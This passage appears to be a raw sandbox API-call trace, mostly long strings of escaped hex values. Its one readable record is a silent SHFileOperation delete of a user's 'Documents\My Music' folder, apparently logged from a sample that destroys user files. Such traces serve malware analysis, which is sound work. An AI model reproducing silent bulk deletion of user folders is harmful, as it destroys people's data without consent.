3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x